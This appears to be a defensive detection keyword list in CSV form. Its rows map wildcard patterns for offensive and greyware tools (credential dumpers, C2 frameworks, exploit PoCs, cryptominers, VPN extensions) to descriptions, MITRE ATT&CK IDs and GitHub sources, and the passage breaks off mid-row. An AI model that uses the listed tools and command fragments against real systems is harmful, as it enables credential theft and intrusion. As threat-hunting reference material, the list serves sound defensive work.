-*GhostPack/SafetyKatz*,offensive_tool_keyword,SafetyKatz,SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete,T1003 - T1055 - T1059 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/SafetyKatz,1,1,N/A,10,10,1101,244,2019-10-01T16:47:21Z,2018-07-24T17:44:15Z -*GhostPack/Seatbelt*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,1,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*GhostPack/SharpDPAPI*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,1,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*Ghostpack-CompiledBinaries*,offensive_tool_keyword,Ghostpack-CompiledBinaries,Compiled Binaries for Ghostpack,T1140 - T1559.002 - T1547.002 - T1055 - T1036.004,TA0005 - TA0002 - TA0040 - TA0036,N/A,N/A,Exploitation Tools,https://github.com/r3motecontrol/Ghostpack-CompiledBinaries,1,1,N/A,N/A,9,855,177,2022-11-08T02:58:06Z,2018-07-25T23:38:15Z -*GhostWebShell.cs*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*gimmecredz*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*ginuerzh/gost*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,1,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z -*Gioyik/getExploit*,offensive_tool_keyword,getExploit,Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.,T1587 - T1068 - T1211 - T1210 - T1588,TA0006 - TA0002 - TA0009 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Gioyik/getExploit,1,1,N/A,N/A,1,43,27,2015-06-26T16:38:55Z,2015-01-03T03:26:21Z -*git log -p | scanrepo *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*github*/COMHunter/*,offensive_tool_keyword,COMHunter,Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI,T1087.002 - T1012 - T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*github*/DeathStar*,offensive_tool_keyword,DeathStar,DeathStar is a Python script that uses Empires RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs.,T1078 - T1059 - T1047 - T1018 - T1069,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation tools,https://github.com/byt3bl33d3r/DeathStar,1,0,N/A,N/A,10,1529,339,2022-12-08T07:44:30Z,2017-05-21T07:34:57Z -*github*/MoveKit.git*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z -*github*/Mr-xn/*,offensive_tool_keyword,spring-core-rce,github user infosec hosting exploitation tools,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/spring-core-rce,1,1,N/A,N/A,1,54,18,2022-04-01T15:34:03Z,2022-03-30T14:35:00Z -*github*/padre.git*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,1,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z -*github*/xmrig/xmrig*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*github.com/*Reaper.exe*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,1,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*github.com/Arno0x*,offensive_tool_keyword,Github Username,Github username known for exploitation toos and scripts,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/Arno0x,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*github.com/BishopFox*,offensive_tool_keyword,Github Username,Private professional services firm providing offensive security testing to the Fortune 500. serving exploitation tools on github,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/BishopFox,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*github.com/bishopfox/*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*github.com/dafthack*,offensive_tool_keyword,Github Username,Github user hosting exploitation tools for pentest and redteam,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/dafthack,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*github.com/g3tsyst3m*,offensive_tool_keyword,elevationstation,github user hosting multiple exploitation tools,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*github.com/GoSecure*,offensive_tool_keyword,Github Username,github repo name containing multiple exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/GoSecure,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*github.com/k8gege*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*github.com/MythicAgents/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*github.com/nccgroup*,offensive_tool_keyword,Github Username,github repo name hosting securty tools and exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/nccgroup,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*github.com/quickbreach*,offensive_tool_keyword,Github Username,An infosec security researcher & penetration tester. hosting offensive tools,N/A,N/A,N/A,N/A,Sniffing & Spoofing,https://github.com/quickbreach,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*github.com/rasta-mouse/*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*github.com/sensepost*,offensive_tool_keyword,Github Username,github repo of orange cyberdefense red team,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/sensepost,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*github.com/SpiderLabs/*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,1,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*github.io/weakpass/generator/*,offensive_tool_keyword,weakpass,Weakpass collection of tools for bruteforce and hashcracking,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/zzzteph/weakpass,1,1,N/A,10,3,293,36,2023-03-17T22:45:29Z,2021-08-29T13:07:37Z -*GithubC2-main*,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,1,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z -*gitleaks detect*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*gitleaks*,offensive_tool_keyword,Gitleaks,Gitleaks is a SAST tool for detecting hardcoded secrets like passwords. api keys. and tokens in git repos. Gitleaks aims to be the easy-to-use. all-in-one solution for finding secrets. past or present. in your code.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/zricethezav/gitleaks,1,1,N/A,N/A,10,13893,1249,2023-10-03T15:38:08Z,2018-01-27T18:19:31Z -*Git-Scanner*,offensive_tool_keyword,Git-Scanner,A tool for bug hunting or pentesting for targeting websites that have open .git repositories available in public,T1213 - T1596 - T1190 - T1590,TA0007 - TA0009 - TA0001,N/A,N/A,Information Gathering,https://github.com/HightechSec/git-scanner,1,1,N/A,N/A,4,303,82,2020-06-23T05:44:26Z,2020-05-17T14:30:19Z -*GIUDA* -askluids*,offensive_tool_keyword,GIUDA,Ask a TGS on behalf of another user without password,T1558.003 - T1059.003,TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/foxlox/GIUDA,1,0,N/A,9,4,387,50,2023-09-28T15:54:16Z,2023-07-19T15:37:07Z -*GIUDA-main.zip*,offensive_tool_keyword,GIUDA,Ask a TGS on behalf of another user without password,T1558.003 - T1059.003,TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/foxlox/GIUDA,1,1,N/A,9,4,387,50,2023-09-28T15:54:16Z,2023-07-19T15:37:07Z -*give_dcsync.py*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,1,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z -*gjknjjomckknofjidppipffbpoekiipm*,greyware_tool_keyword,VPN Free,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*gkojfkhlekighikafcpjkiklfbnlmeio*,greyware_tool_keyword,Hola Free VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*glassfish_war_upload_xsrf*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*glebarez/padre*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,1,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z -*glit org -*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*glit repo *,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*glit user *,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*glit.exe org*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*glit.exe repo*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*glit.exe user*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*glit-i686-pc-windows-msvc*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,1,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*glit-main.zip*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,1,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*glit-x86_64-apple-darwin*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,1,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*glit-x86_64-pc-windows-msvc*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,1,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*glit-x86_64-unknown-linux-gnu*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,1,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*global.rel.tunnels.api.visualstudio.com*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*global.rel.tunnels.api.visualstudio.com*,greyware_tool_keyword,vscode,built-in port forwarding. This feature allows you to share locally running services over the internet to other people and devices.,T1090 - T1003 - T1571,TA0010 - TA0002 - TA0009,N/A,N/A,C2,https://twitter.com/code/status/1699869087071899669,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*global.rel.tunnels.api.visualstudio.com*,greyware_tool_keyword,vscode,Starts a reverse connection over global.rel.tunnels.api.visualstudio.com via websockets,T1090.003 - T1059.001 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://badoption.eu/blog/2023/01/31/code_c2.html,1,1,risk of False positive,10,10,N/A,N/A,N/A,N/A -*gloxec/CrossC2*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*gloxec/CrossC2*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*GmailC2.csproj*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,1,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*gmsa_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*gMSADumper.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*gMSADumper.py*,offensive_tool_keyword,gMSADumper,Lists who can read any gMSA password blobs and parses them if the current user has access.,T1552.001 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/micahvandeusen/gMSADumper,1,1,N/A,N/A,2,190,34,2023-08-23T13:32:49Z,2021-04-10T00:15:24Z -*GMSAPasswordReader.exe*,offensive_tool_keyword,GMSAPasswordReader,Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/rvazarkar/GMSAPasswordReader,1,1,N/A,7,2,103,23,2023-02-17T14:37:40Z,2020-01-19T19:06:20Z -*GMSAPasswordReader-master*,offensive_tool_keyword,GMSAPasswordReader,Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/rvazarkar/GMSAPasswordReader,1,1,N/A,7,2,103,23,2023-02-17T14:37:40Z,2020-01-19T19:06:20Z -*GMShellcode*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*GMShellcode.*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*GMShellcode\*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*go build Ivy.go*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*go get -u *traitor/cmd/traitor*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,0,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*go run poc.go check -t http://*:8080 -u Admin*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/trganda/CVE-2022-23131,1,0,N/A,N/A,1,1,1,2022-02-24T11:50:28Z,2022-02-24T08:10:46Z -*go run scannerPort.go*,offensive_tool_keyword,GONET-Scanner,port scanner and arp discover in go,T1595,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/luijait/GONET-Scanner,1,0,N/A,N/A,1,72,18,2022-03-10T04:35:58Z,2022-02-02T19:39:09Z -*go_shellcode_encode.py*,offensive_tool_keyword,cobaltstrike,bypassAV cobaltstrike shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 